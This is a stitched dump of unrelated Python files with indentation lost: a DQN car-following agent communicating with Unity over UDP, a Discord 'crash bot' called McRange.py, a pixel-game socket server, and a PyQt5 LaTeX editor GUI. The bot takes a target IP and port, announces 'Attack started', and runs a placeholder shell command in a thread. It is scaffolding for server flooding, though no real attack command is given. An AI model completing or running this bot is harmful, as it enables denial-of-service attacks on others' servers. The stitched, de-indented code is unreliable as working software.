self.train = True
# Get size of state and action
self.state_size = state_size
self.action_size = action_size
self.device = device_
# These are hyper parameters for the DQN
self.discount_factor = 0.99
self.learning_rate = 1e-4
if self.train:
self.epsilon = 1.0
self.initial_epsilon = 1.0
else:
self.epsilon = 0
self.initial_epsilon = 0
self.epsilon_min = 0.01
self.batch_size = 64
self.train_start = 100
self.explore = 4000
# Create replay memory using deque
self.memory = deque(maxlen=32000)
# Create main model and target model
self.model = build_model().to(self.device)
self.target_model = build_model().to(self.device)
# Copy the model to target model
# --> initialize the target model so that the parameters of model & target model to be same
self.update_target_model()
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=1e-4)
self.loss = torch.nn.MSELoss()
def process_image(self, obs):
obs = skimage.color.rgb2gray(obs)
return obs
# camera_info = CamInfo({
# "f_x": 500/5*8, # focal length x
# "f_y": 500/5*8, # focal length y
# "u_x": 200, # optical center x
# "u_y": 200, # optical center y
# "camera_height": 1400, # camera height in `mm`
# "pitch": 90, # rotation degree around x
# "yaw": 0 # rotation degree around y
# })
# ipm_info = CamInfo({
# "input_width": 400,
# "input_height": 400,
# "out_width": 80,
# "out_height": 80,
# "left": 0,
# "right": 400,
# "top": 200,
# "bottom": 400
# })
# ipm_img = IPM(camera_info, ipm_info)
# out_img = ipm_img(obs)
# if gap < 10:
# skimage.io.imsave('outimage_' + str(gap) + '.png', out_img)
# return out_img
def update_target_model(self):
# 解决state_dict浅拷贝问题
weight_model = copy.deepcopy(self.model.state_dict())
self.target_model.load_state_dict(weight_model)
# Get action from model using epsilon-greedy policy
def get_action(self, Input):
if np.random.rand() <= self.epsilon:
# print("Return Random Value")
# return random.randrange(self.action_size)
return np.random.uniform(-1, 1)
else:
# print("Return Max Q Prediction")
q_value = self.model(Input[0], Input[1])
# Convert q array to steering value
return linear_unbin(q_value[0])
def replay_memory(self, state, v_ego, action, reward, next_state, nextV_ego, done):
self.memory.append((state, v_ego, action, reward, next_state, nextV_ego, done, self.t))
if self.epsilon > self.epsilon_min:
self.epsilon -= (self.initial_epsilon - self.epsilon_min) / self.explore
# @profile
def train_replay(self):
if len(self.memory) < self.train_start:
return
batch_size = min(self.batch_size, len(self.memory))
minibatch = random.sample(self.memory, batch_size)
'''
torch.float64对应torch.DoubleTensor
torch.float32对应torch.FloatTensor
'''
state_t, v_ego_t, action_t, reward_t, state_t1, v_ego_t1, terminal, step = zip(*minibatch)
state_t = Variable(torch.Tensor(state_t).squeeze().to(self.device))
state_t1 = Variable(torch.Tensor(state_t1).squeeze().to(self.device))
v_ego_t = Variable(torch.Tensor(v_ego_t).squeeze().to(self.device))
v_ego_t1 = Variable(torch.Tensor(v_ego_t1).squeeze().to(device))
self.optimizer.zero_grad()
targets = self.model(state_t, v_ego_t)
self.max_Q = torch.max(targets[0]).item()
target_val = self.model(state_t1, v_ego_t1)
target_val_ = self.target_model(state_t1, v_ego_t1)
for i in range(batch_size):
if terminal[i] == 1:
targets[i][action_t[i]] = reward_t[i]
else:
a = torch.argmax(target_val[i])
targets[i][action_t[i]] = reward_t[i] + self.discount_factor * (target_val_[i][a])
logits = self.model(state_t, v_ego_t)
loss = self.loss(logits, targets)
loss.backward()
self.optimizer.step()
self.trainingLoss = loss.item()
def load_model(self, name):
checkpoints = torch.load(name)
self.model.load_state_dict(checkpoints['model'])
self.optimizer.load_state_dict(checkpoints['optimizer'])
# Save the model which is under training
def save_model(self, name):
torch.save({'model': self.model.state_dict(),
'optimizer': self.optimizer.state_dict()}, name)
# 单目标斜对角坐标
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xyxy2xyxy(x):
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = x[:, 0]
y[:, 1] = x[:, 1]
y[:, 2] = x[:, 2]
y[:, 3] = x[:, 3]
y = y.type(torch.IntTensor)
return y
def linear_bin(a):
"""
Convert a value to a categorical array.
Parameters
----------
a : int or float
A value between -1 and 1
Returns
-------
list of int
A list of length 21 with one item set to 1, which represents the linear value, and all other items set to 0.
"""
a = a + 1
b = round(a / (2 / 20))
arr = np.zeros(21)
arr[int(b)] = 1
return arr
def linear_unbin(arr):
"""
Convert a categorical array to value.
See Also
--------
linear_bin
"""
arr = arr.data.cpu().numpy()
if not len(arr) == 21:
raise ValueError('Illegal array length, must be 21')
b = np.argmax(arr)
a = b * 2 / 20 - 1
return a
# def oberve():
# revcData, (remoteHost, remotePort) = sock.recvfrom(65536)
def decode(revcData, v_ego = 0, force = 0, episode_len = 0):
# received data processing
revcList = str(revcData).split(',', 4)
gap = revcList[0][2:] # distance between vehicles
v_ego1 = revcList[1] # speed of egoVehicle
v_lead = revcList[2] # speed of leadVehicle
a_ego1 = revcList[3] # acceleration of egoVehicle
img = base64.b64decode(revcList[4]) # image from mainCamera
image = Image.open(io.BytesIO(img))
image.save(f'./{PATH_DATASET}/data_{time_Feature}/{agent.t:05}.jpg', quality=95)
# image resize, 双线性插值
image = image.resize((80, 80), resample=Image.BILINEAR)
image = np.array(image)
done = 0
reward = CalReward(float(gap), float(v_ego), float(v_lead), force)
if float(gap) <= 3 or float(gap) >= 300:
done = 1
reward = -1.0
elif episode_len > 480:
done = 2
# reward = CalReward(float(gap), float(v_ego), float(v_lead), force)
return image, reward, done, float(gap), float(v_ego1), float(v_lead), float(a_ego1)
def CalReward(gap, v_ego, v_lead, force):
Rd, Rp = 0, 0
Rd, Rp = 0, 1
if force>0:
a = 3.5*force
else:
a = 5.5*force
L0 = -3.037
L1 = -0.591
L3 = -1.047e-3
L4 = -1.403
L5 = 2.831e-2
L8 = -7.98e-2
L11 = 3.535e-3
L12 = -0.243
Rp = (L0 + L1*v_ego + L3*(v_ego**3) + L4* v_ego * a + L5*(v_ego**2) + L8 * (v_ego**2) * a + L11 * (v_ego**3) * a + L12 * v_ego * (a**2))
if Rp>0:
Rp = 0
Rp = Rp + 195
if v_ego > 40:
Rp = 0
# reward for gap
if gap >= 40 and gap <= 60:
Rd = 1
elif gap >= 30 and gap < 40:
Rd = 0.5
elif gap > 60 and gap <= 100:
Rd = 0.5
else:
Rd = 0.0
# if gap >= 40 and gap <= 60:
# Rd = 1
# elif gap >= 30 and gap < 40:
# Rd = np.power(1.29, (gap - 40))
# elif gap > 60 and gap <= 100:
# Rd = np.power(1.29, (-gap + 60))
# else:
# Rd = 0
# return Rp*Rd
return Rp*Rd/195.0
def reset():
strr = str(3) + ',' + '0.0'
sendDataLen = sock.sendto(strr.encode(), (remoteHost, remotePort))
def print_out(file, text):
file.write(text + '\n')
file.flush()
sys.stdout.flush()
# @profile
def thread_Train_init():
global agent
step_epsode = 0
while True:
if len(agent.memory) < agent.train_start:
time.sleep(5)
continue
agent.train_replay()
time.sleep(0.1)
step_epsode += 1
# print('train complete in num: %s' %str(step_epsode))
def log_File_path(path):
# date = str(dt.date.today()).split('-')
# date_concat = date[1] + date[2]
date_concat = time_Feature
train_log = open(os.path.join(path, 'train_log_{}.txt'.format(date_concat)), 'w')
del date_concat
return train_log
def random_sample(state_t, v_t, state_t1, v_t1):
# random_index = np.random.permutation(img_channels)
state_t = state_t[:, :, :, random_index]
v_t = v_t[:, random_index]
state_t1 = state_t1[:, :, :, random_index]
v_t1 = v_t1[:, random_index]
return state_t, v_t, state_t1, v_t1
def Recv_data_Format(byte_size, _done, v_ego=None, action=None, episode_len=None, s_t=None, v_ego_t=None):
if _done != 0:
revcData, (remoteHost, remotePort) = sock.recvfrom(byte_size)
image, _, _, gap, v_ego, _, a_ego = decode(revcData)
x_t = agent.process_image(image)
s_t = np.stack((x_t, x_t, x_t, x_t), axis=0)
v_ego_t = np.array((v_ego, v_ego, v_ego, v_ego))
# In Keras, need to reshape
s_t = s_t.reshape(1, s_t.shape[0], s_t.shape[1], s_t.shape[2]) #1*80*80*4
v_ego_t = v_ego_t.reshape(1, v_ego_t.shape[0]) #1*4
return s_t, v_ego_t, v_ego, remoteHost, remotePort
else:
revcData, (remoteHost, remotePort) = sock.recvfrom(byte_size)
image, reward, done, gap, v_ego1, v_lead, a_ego1 = decode(revcData, v_ego, action, episode_len)
x_t1 = agent.process_image(image)
x_t1 = x_t1.reshape(1, 1, x_t1.shape[0], x_t1.shape[1]) # 1x1x80x80
s_t1 = np.append(x_t1, s_t[:, :3, :, :], axis=1) # 1x4x80x80
v_ego_1 = np.array(v_ego1)
v_ego_1 = np.expand_dims(v_ego_1, -1)
v_ego_1 = np.expand_dims(v_ego_1, -1)
v_ego_t1 = np.append(v_ego_1, v_ego_t[:, :3], axis=1) # 1x4
return reward, done, gap, v_ego1, v_lead, a_ego1, v_ego_1, s_t1, v_ego_t1
# def Send_data_Format(remoteHost, remotePort, onlyresetloc, s_t, v_ego_t):
def Send_data_Format(remoteHost, remotePort, s_t, v_ego_t, episode_len, UnityReset):
pred_time_pre = dt.datetime.now()
episode_len = episode_len + 1
# Get action for the current state and go one step in environment
s_t = torch.Tensor(s_t).to(device)
v_ego_t = torch.Tensor(v_ego_t).to(device)
force = agent.get_action([s_t, v_ego_t])
action = force
if UnityReset == 1:
strr = str(4) + ',' + str(action)
UnityReset = 0
else:
strr = str(1) + ',' + str(action)
sendDataLen = sock.sendto(strr.encode(), (remoteHost, remotePort)) # 0.06s later receive
pred_time_end = dt.datetime.now()
time_cost = pred_time_end - pred_time_pre
return episode_len, action, time_cost, UnityReset
def Model_save_Dir(PATH, time):
path_to_return = os.path.join(PATH, 'save_model_{}'.format(time)) + '/'
if not os.path.exists(path_to_return):
os.mkdir(path_to_return)
return path_to_return
if __name__ == "__main__":
if not os.path.exists('./' + PATH_LOG):
os.mkdir(os.path.join(os.getcwd().replace('\\', '/'), PATH_LOG))
if not os.path.exists('./' + PATH_MODEL):
os.mkdir(os.path.join(os.getcwd().replace('\\', '/'), PATH_MODEL))
os.mkdir(os.path.join(os.getcwd(), PATH_DATASET, f'data_{time_Feature}').replace('\\', '/'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 8001))
device = torch.device('cpu')
# Get size of state and action from environment
state_size = (img_rows, img_cols, img_channels)
action_size = 21 # env.action_space.n # Steering and Throttle
train_log = log_File_path(PATH_LOG)
PATH_ = Model_save_Dir(PATH_MODEL, time_Feature)
agent = DQNAgent(state_size, action_size, device)
episodes = []
if not agent.train:
print("Now we load the saved model")
agent.load_model("C:/DRL_data/Python_Project/Enhence_Learning/save_Model/save_model_1627300305/save_model_248.pt")
else:
# train_thread = threading.Thread(target=thread_Train_init)
# train_thread.start()
print('Thread Ready!!!')
done = 0
for e in range(EPISODES):
print("Episode: ", e)
# Multi Thread
if done == 2:
print("new continued epicode!")
done = 0
UnityReset = 1
episode_len = 0
else:
# 后期重置进入第一次recv
print('done value:', done)
print("new fresh episode!")
done = 1
s_t, v_ego_t, v_ego, remoteHost, remotePort = Recv_data_Format(unity_Block_size, done)
done = 0
UnityReset = 0
episode_len = 0
while done == 0:
start_time = time.time()
if agent.t % 1000 == 0:
rewardTot = []
episode_len, action, time_cost, UnityReset = Send_data_Format(remoteHost, remotePort, s_t, v_ego_t, episode_len, UnityReset)
reward, done, gap, v_ego1, v_lead, a_ego1, v_ego_1, s_t1, v_ego_t1 = Recv_data_Format(unity_Block_size, done, v_ego, action, episode_len, s_t, v_ego_t)
rewardTot.append(reward)
start_count_time = int(round(time.time() * 1000))
if agent.train:
# s_t, v_ego_t, s_t1, v_ego_t1 = random_sample(s_t, v_ego_t, s_t1, v_ego_t1)
agent.replay_memory(s_t, v_ego_t, np.argmax(linear_bin(action)), reward, s_t1, v_ego_t1, done)
agent.train_replay()
s_t = s_t1
v_ego_t = v_ego_t1
v_ego = v_ego_1
agent.t = agent.t + 1
print("EPISODE", e, "TIMESTEP", agent.t,"/ ACTION", action, "/ REWARD", reward, "Avg REWARD:",
sum(rewardTot)/len(rewardTot) , "/ EPISODE LENGTH", episode_len, "/ Q_MAX " ,
agent.max_Q, "/ time " , time_cost, a_ego1)
format_str = ('EPISODE: %d TIMESTEP: %d EPISODE_LENGTH: %d ACTION: %.4f REWARD: %.4f Avg_REWARD: %.4f training_Loss: %.4f Q_MAX: %.4f gap: %.4f v_ego: %.4f v_lead: %.4f time: %.0f a_ego: %.4f')
text = (format_str % (e, agent.t, episode_len, action, reward, sum(rewardTot)/len(rewardTot), agent.trainingLoss*1e3, agent.max_Q, gap, v_ego1, v_lead, time.time()-start_time, a_ego1))
print_out(train_log, text)
if done:
agent.update_target_model()
episodes.append(e)
# Save model for every 2 episode
if agent.train and (e % 2 == 0):
agent.save_model(os.path.join(PATH_, "save_model_{}.h5".format(e)))
print("episode:", e, " memory length:", len(agent.memory),
" epsilon:", agent.epsilon, " episode length:", episode_len)
if done == 1:
reset()
time.sleep(0.5)
print('Data receive from unity, time:', int(round(time.time() * 1000) - start_count_time))
# Tensorboard_saver = tf.summary.FileWriter('E:/Python_Project/Enhence_Learning/Tensorboard/', tf.get_default_graph())
# lp = LineProfiler()
# lp_wrapper = lp(agent.train_replay())
# lp.print_stats()
|
McRange.py | import random
import socket
import threading
import discord
from discord.ext import commands
import os
import threading
import asyncio
import requests
client= commands.Bot(command_prefix = '.')
print("""
SSSSSSSSSSSSSSS KKKKKKKKK KKKKKKKIIIIIIIIIIDDDDDDDDDDDDD
SS:::::::::::::::SK:::::::K K:::::KI::::::::ID::::::::::::DDD
S:::::SSSSSS::::::SK:::::::K K:::::KI::::::::ID:::::::::::::::DD
S:::::S SSSSSSSK:::::::K K::::::KII::::::IIDDD:::::DDDDD:::::D
S:::::S KK::::::K K:::::KKK I::::I D:::::D D:::::D
S:::::S K:::::K K:::::K I::::I D:::::D D:::::D
S::::SSSS K::::::K:::::K I::::I D:::::D D:::::D
SS::::::SSSSS K:::::::::::K I::::I D:::::D D:::::D
SSS::::::::SS K:::::::::::K I::::I D:::::D D:::::D
SSSSSS::::S K::::::K:::::K I::::I D:::::D D:::::D
S:::::S K:::::K K:::::K I::::I D:::::D D:::::D
S:::::SKK::::::K K:::::KKK I::::I D:::::D D:::::D
SSSSSSS S:::::SK:::::::K K::::::KII::::::IIDDD:::::DDDDD:::::D
S::::::SSSSSS:::::SK:::::::K K:::::KI::::::::ID:::::::::::::::DD
S:::::::::::::::SS K:::::::K K:::::KI::::::::ID::::::::::::DDD
SSSSSSSSSSSSSSS KKKKKKKKK KKKKKKKIIIIIIIIIIDDDDDDDDDDDDD
Mcrange crash bot by ae#7990
""")
@client.event
async def on_ready():
print("bot dziala")
@client.command()
async def aegis(ctx, arg1, arg2):
embed = discord.Embed(colour = discord.Colour.blue())
embed.add_field(name='<--> Attack started <-->', value=f'ip: {arg1}', inline=False)
embed.add_field(name='-------------------', value=f'port: {arg2}', inline=False)
embed.add_field(name='<--> Attack started <-->', value='', inline=True)
embed.set_footer(text='Developer your toem#7990')
embed.set_thumbnail(url='https://cdn.discordapp.com/attachments/854388755463798844/858007596337201152/PicsArt_06-25-03.48.06.png')
embed.set_image(url='https://cdn.discordapp.com/attachments/854388755463798844/858007598816690196/PicsArt_06-25-03.54.17.jpg')
await ctx.send(embed=embed)
def attack():
os.system(f"your command")
t1 = threading.Thread(target=attack)
t1.start()
@client.command()
async def instant(ctx, arg1, arg2):
embed = discord.Embed(colour = discord.Colour.blue())
embed.add_field(name='<--> Attack started <-->', value=f'ip: {arg1}', inline=False)
embed.add_field(name='-------------------', value=f'port: {arg2}', inline=False)
embed.add_field(name='<--> Attack started <-->', value='', inline=True)
embed.set_footer(text='Developer your toem#7990')
embed.set_thumbnail(url=f'https://api.mcsrvstat.us/icon/{arg1}')
embed.set_image(url='https://cdn.discordapp.com/attachments/854388755463798844/858007598816690196/PicsArt_06-25-03.54.17.jpg')
await ctx.send(embed=embed)
def attack():
os.system(f"your command")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
client.run('token')
|
pfsystem.py | # !/usr/bin/env python3
# -*- coding:utf-8 -*-
__author__ = 'Zhiquan Wang'
__date__ = '2018/7/20 22:28'
import threading
from networkservice import *
from pfgame import *
from pfmessage import *
class PixelFightSystem(object):
def __init__(self, *, ip=None, port=None):
self.__networkSev = NetworkService(ip, port)
self.__game = PixelFightGame()
def launch(self):
network_thread = threading.Thread(target=self.launch_socket)
network_thread.start()
self.__game.launch()
# 开启服务器端监听
# 每当收到建立新的连接,开启一个线程处理
def launch_socket(self):
try:
self.__networkSev.listen()
print('Start Listening')
while True:
client_socket_info = self.__networkSev.socket.accept()
address_thread = threading.Thread(target=self.__address_msg, args=(client_socket_info,))
address_thread.start()
except Exception:
print('Launch Server System Failed')
# 连接处理线程,保持接受状态,每当收到新的请求,处理并返回结果
def __address_msg(self, _c_socket_info):
client_socket = _c_socket_info[0]
# try:
# Receive Client Message
while True:
data = client_socket.recv(2048)
if not data:
continue
client_msg = data.decode('utf-8')
self.__address_request(client_msg, client_socket)
# except Exception as e:
# print('Error:Class:PixelFightSystem:address_msg :' + str(e))
# client_socket.close()
# 请求处理函数,识别请求类别并提供服务
def __address_request(self, _msg, _s):
tmp_type = get_msg_type(_msg)
print(u'Server Receive:' + _msg + ':End')
if tmp_type == MessageType.login_request:
tmp_obj = LoginRequest(json_info=_msg)
tmp_id = self.__game.gen_player_id(tmp_obj.usr_name, _s)
tmp_rep = LoginReply(id=tmp_id).dump_json()
_s.sendall(tmp_rep.encode('utf-8'))
print(u'Server Reply:' + tmp_rep + ':End')
# 当玩家全部接入,开始游戏
if len(self.__game.player_info_list) == self.__game.game_rule.player_num:
self.__game.is_ready = True
elif tmp_type == MessageType.attack_request:
tmp_obj = AttackRequest(json_info=_msg)
self.__game.attack_grid(tmp_obj.x, tmp_obj.y, tmp_obj.player_id)
print("Player :" + tmp_obj.player_id + "Attack : " + str(tmp_obj.x) + " - " + str(tmp_obj.y))
self.__game.is_pause = False
|
gui.py | """
The GUI file, reserved for all interactions
GUI-wise and some others that fit within the
category or are critical / necessary for the GUI to run.
"""
from os import listdir
from random import randint
from threading import Thread
from time import sleep, time
from PyQt5 import QtGui
from PyQt5.QtCore import QEvent, Qt, QCoreApplication, QTimer
from PyQt5.QtGui import QPixmap, QIcon, QFont, QTextCursor, QTextBlockFormat, QColor
from PyQt5.QtWidgets import QLabel, QPlainTextEdit, QMainWindow, QListWidget, QListWidgetItem, QGroupBox, QSpinBox
from keyboard import is_pressed as is_key_pressed
from compile import compile_to_image
from error import Error
from menu import Menu, Status
from project import Project
from updater import Updater
from utility import Utility
# Initialize class
# noinspection PyCompatibility,PyAttributeOutsideInit
class App(QMainWindow):
"""
The App class, for everything-GUI.
Executed by the main.py file.
"""
# Constructor
def __init__(self):
"""
The initializer / constructor method of the GUI class.
Here, elements (and other small things for the GUI) are initialized and set.
"""
super().__init__()
# Initialize exit codes (These are arbitrary values with no hidden meaning)
self.restart_code = -54321
# Create instance of Error class
self.error_instance = Error()
# Create instance of Utility for later usage
self.utils = Utility(self)
# Verify that file system is intact
self.utils.verify_system()
# Pull settings
self.settings = self.utils.get_settings()
# Clear cache
self.utils.clear_cache()
# Load the theme
self.theme = self.utils.load_theme(self.settings)
# Open new project (remove this part and integrate Open File, when the Open File features is ready)
self.project = Project("../project/current.tex")
self.project.new()
self.projects = [self.project]
self.projects_index = int()
# Create an instance of the Updater class
self.updater_instance = Updater()
# Set default compiler live identifier number
self.live = int()
self.live_update = int()
self.live_compile = str()
# Other attributes
self.last_data = str()
self.last_update = time()
self.status = str()
self.settings_opened = False
# Get screen data
self.screen_width = self.utils.get_screen()[0]
self.screen_height = self.utils.get_screen()[1]
# Set min_spin size
min_width = int(self.screen_width * self.settings["min_ratio"])
min_height = int(self.screen_height * self.settings["min_ratio"])
self.setMinimumSize(min_width, min_height)
# Set icon
self.setWindowIcon(QIcon("../resources/logo.jpg"))
# Title
self.title = self.settings["window_title"]
# Screen coordinate initialization
self.left = self.settings["init_x"]
self.top = self.settings["init_y"]
# Calculate gui size
self.width = int(self.screen_width * self.settings["screen_ratio"])
self.height = int(self.screen_height * self.settings["screen_ratio"])
# Initialize elements
# Default parameter values are all 0 because self.resizeElements
# will update the positioning and size of each element regardless
# The editor box which code is written in
self.editor_box = self.make_text_box()
self.editor_box.ensureCursorVisible()
self.editor_box.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.editor_box.setFont(QFont(self.settings["editor_font"], self.settings["editor_size"]))
self.editor_box.setCursorWidth(self.settings["cursor_width"])
self.editor_box.installEventFilter(self)
# The live-compile renderer element
self.editor_compiled = self.make_pic(background=self.theme["Live"]["background-color"])
# Create Settings list element
self.settings_list = self.make_list(["Appearance", "Shortcuts", "Advanced"])
self.settings_list.setFont(
QFont(
self.settings["menu_font"],
self.width ** 0.5 * 0.5
)
)
# Create groups for elements
self.theme_group = QGroupBox(self)
self.editor_group = QGroupBox(self)
self.menu_group = QGroupBox(self)
# Rename the group titles
self.theme_group.setTitle("Theme")
self.editor_group.setTitle("Editor")
self.menu_group.setTitle("Menu")
# For each theme file in the themes folder...
theme_list = list()
for file in listdir("../gui_themes"):
if file.endswith(".yaml"):
# Append it to the theme list
theme_list.append(file[:-5])
# Create the list widget with the themes
self.theme_select_element = self.make_list(
items=theme_list,
parent=self.theme_group
)
# Specify the valid fonts
font_list = ["Consolas", "Arial", "Comic Sans"]
# Create the font selection elements
self.font_select_element = self.make_list(
items=font_list,
parent=self.editor_group
)
self.menu_font_select_element = self.make_list(
items=font_list,
parent=self.editor_group
)
# Create the spinbox elements
self.font_size_element = self.make_spinbox(
min_spin=8,
max_spin=22,
step=2,
parent=self.editor_group
)
self.cursor_size_element = self.make_spinbox(
min_spin=1,
max_spin=10,
parent=self.editor_group
)
# Create the text elements
self.font_size_label_element = self.make_text(
text="Font Size",
parent=self.editor_group
)
self.cursor_size_label_element = self.make_text(
text="Cursor Size",
parent=self.editor_group
)
self.editor_font_element = self.make_text(
text="Editor Font",
parent=self.editor_group
)
# Create the spinbox elements
self.menu_bar_size_select_element = self.make_spinbox(
min_spin=6,
max_spin=14,
parent=self.menu_group
)
self.status_bar_size_select_element = self.make_spinbox(
min_spin=6,
max_spin=14,
parent=self.menu_group
)
self.status_bar_margin_select_element = self.make_spinbox(
min_spin=1,
max_spin=20,
parent=self.menu_group
)
self.status_bar_spacing_select_element = self.make_spinbox(
min_spin=1,
max_spin=10,
parent=self.menu_group
)
# Create the text elements
self.menu_bar_size_element = self.make_text(
text="Menu Bar Size",
parent=self.menu_group
)
self.status_bar_size_element = self.make_text(
text="Status Bar Size",
parent=self.menu_group
)
self.menu_font_element = self.make_text(
text="Menu Font",
parent=self.menu_group
)
self.status_bar_margin_element = self.make_text(
text="Status Bar Margin",
parent=self.menu_group
)
self.status_bar_spacing_element = self.make_text(
text="Status Bar Spacing",
parent=self.menu_group
)
# Force disable scrolling
self.theme_select_element.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.theme_select_element.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.font_select_element.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.font_select_element.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.menu_font_select_element.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.menu_font_select_element.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
# Set the order of how tabs jump through elements
self.set_tab_order([
self.theme_select_element,
self.menu_font_select_element,
self.menu_bar_size_select_element,
self.status_bar_size_select_element,
self.status_bar_margin_select_element,
self.status_bar_spacing_select_element,
self.font_select_element,
self.font_size_element,
self.cursor_size_element
])
# Create instance of Menu and Status Bar classes
# Initialize it here rather in the above 'attribute initialization section'
# because you can't call the Status Bar updating function until
self.menu_bar_instance = Menu(self)
self.status_bar_instance = Status(self)
# MAKE SURE THAT MENU BAR AND STATUS BAR ARE THE LAST 2 ELEMENTS TO BE INITIALIZED
# If not, the next element to be created will overlap the menu bar &
# status bar and will cause an unfortunate rendering bug.
# Initialize the menu bar
self.menu_bar_instance.init()
# Initialize the status bar
self.status_bar_instance.init()
# Initialize the status bar data
self.status_bar_instance.init_status()
# Set Project focus to current project
self.switch_project()
# Set a timer to constantly check for new edits
self.update_timer = QTimer(self)
self.update_timer.setInterval(self.settings["live_await"] * 1000)
self.update_timer.timeout.connect(self.check_data_update)
self.update_timer.start()
# Default to Editor slide being displayed
# Call this so that all non-editor elements are hidden
self.show_editor()
# Call GUI creation
self.initUI()
# Set the theme of the whole window
self.setStyleSheet("background-color: {QMainWindowBGColor};".strip().format(
QMainWindowBGColor=self.utils.hex_format(self.theme["GUI"]["QMainWindow"]["background-color"])
))
# Resize the elements to the current window size
self.resizeEvent()
# noinspection PyCompatibility
def event(self, e):
"""
PyQt5 Built-in method called when an event occurs.
This is a function called on by the PyQt5 library during GUI
interactions, it is not called within this code.
"""
if e.type() == QEvent.StatusTip:
if e.tip() == '':
e = QtGui.QStatusTipEvent(self.status_bar_instance.status)
return super().event(e)
def eventFilter(self, obj, event):
"""
The event filter is the function called
every time an event is generated in the editor_box.
In most cases, an event is a keystroke.
"""
if obj is self.editor_box and event.type() == QEvent.KeyPress:
# Key Binds
self.status_bar_instance.update_status({"Task": "Parsing binds..."})
# Shift + Return = Add / and newline
if is_key_pressed("return") and is_key_pressed("shift"):
self.editor_box.insertPlainText("\\\\\n")
return True
self.status_bar_instance.update_status({"Task": "Idling"})
return super(App, self).eventFilter(obj, event)
def check_data_update(self):
"""
A function to check if the text from the editor
box was updated. This function should be utilized
by pairing it with a timer to constantly ping it.
"""
# Try finding a way to debunk the thread,
# as to improve memory space and compiling
# efficiency and speed.
# If the text was updated...
if self.last_data != self.editor_box.toPlainText():
# Update the marker for the last data
self.last_data = self.editor_box.toPlainText()
# If there are characters in the window...
if self.editor_box.toPlainText().strip():
# If the code can't be 'debunked' and is ready
# to compile, then call the compiler function.
self.thread_compile()
else:
# If there are no characters, make sure there is no picture
self.editor_compiled.setPixmap(QPixmap())
self.status_bar_instance.update_status({"Task": "Idling"})
def thread_compile(self):
"""
The method which starts a compiler thread.
Written as a method as to be called easier.
"""
# Generate a random ID and pass it as a parameter to
# the compiler thread. Set the ID as an attribute so that
# the compiler thread can also access it. If the compiler thread
# notices that its ID is not matching to the attribute ID,
# then that means that the compiler thread is invalid,
# and that a new thread is the latest thread which should run.
# Update last edit time
self.last_update = time()
# Set the current live ID and pass it to the function
live_id = randint(0, 999999999999999)
self.live = live_id
# Set the time at which to call the live update
self.live_update = time() + self.settings["live_update"]
# Initialize the process
self.status_bar_instance.update_status({"Task": "Multiprocessing..."})
p = Thread(target=self.updateLive, args=[live_id])
p.setDaemon(True)
p.start()
def updateLive(self, liveID):
"""
This function is used to compile and update the image
displaying the live version of the LaTeX source code.
:param liveID: An ID which is passed just before called. If the global live ID is not equal to this function's
live ID, then this function will terminate (another key was pressed, therefore this function is old and the
new function should compile together the new LaTeX source code)
This function doesn't return any data, it calls directly on the editor_compiled attribute and updates the image.
"""
# Wait until it's time to update the live
while time() < self.live_update:
if self.live != liveID:
return
sleep(self.settings["live_thread_refresh"])
# Check if the liveID is this function's ID
if self.live != liveID:
return
# If the ID is equal, then continue.
# From this point on, the actual compiler will run.
# That is to say, the above code is only a check
# that there are not multiple threads attempting
# to compile at the same time, and that only after
# a delay will the compiler threads attempt to compile.
# Update project
self.status_bar_instance.update_status({"Task": "Saving..."})
self.project.save(self.editor_box.toPlainText(), overwrite=True)
# Update the status bar
self.status_bar_instance.update_status({
"Words": len([item for item in self.editor_box.toPlainText().split(" ") if item.strip()]),
"Characters": len(self.editor_box.toPlainText())
})
# Compile the code to an image
self.status_bar_instance.update_status({"Task": "Compiling..."})
page_index = 1 # TO DO (ADD SCROLL ELEMENT WHICH ALTERS THIS VALUE & MAKE THIS VALUE AN ATTRIBUTE)
compiled_return_data = compile_to_image(
app_pointer=self,
path=self.project.file_name,
quality=self.settings["live_quality"]
)
# If the file was successfully compiled...
if compiled_return_data[0]:
# Update the live image element
self.status_bar_instance.update_status({"Task": "Updating..."})
self.live_compile = "{path}{index}.jpg".format(path=compiled_return_data[0], index=page_index)
pixel_map = QPixmap(self.live_compile)
self.editor_compiled.setPixmap(pixel_map)
self.editor_compiled.setScaledContents(True)
# Clear the error coloring
self.status_bar_instance.update_status({"Task": "Clearing..."})
# Get the cursor element and its position
cursor_pos = self.editor_box.textCursor().position()
# Reset the window by overwriting all text with itself
self.editor_box.setPlainText(self.editor_box.toPlainText())
# Set the block position again
cursor = self.editor_box.textCursor()
cursor.setPosition(cursor_pos)
self.editor_box.setTextCursor(cursor)
# Otherwise, if there was a compilation error,
else:
# If there is a compilation error... (otherwise, the second
# item would be returned as false from the compileToImage function)
if compiled_return_data[1]:
# compiled_return_data[1] now holds the error message as a string
# Make a formatter object which colors the background
self.status_bar_instance.update_status({"Task": "Parsing..."})
color_format = QTextBlockFormat()
error_color = self.utils.hex_to_rgb(self.utils.hex_format(self.theme["Editor"]["error"]))
color_format.setBackground(QColor(error_color[0], error_color[1], error_color[2]))
# For each line which has an error...
for line, message in self.utils.parse_errors(compiled_return_data[1]).items():
# Set a cursor to the line number
cursor = QTextCursor(self.editor_box.document().findBlockByNumber(line - 1))
# Update the background color
cursor.setBlockFormat(color_format)
self.status_bar_instance.update_status({
"Compile Time": round(time() - self.last_update, 2),
"Task": "Idling"
})
def initUI(self):
"""
A function which sets the basics of the window- title, size, and displaying it.
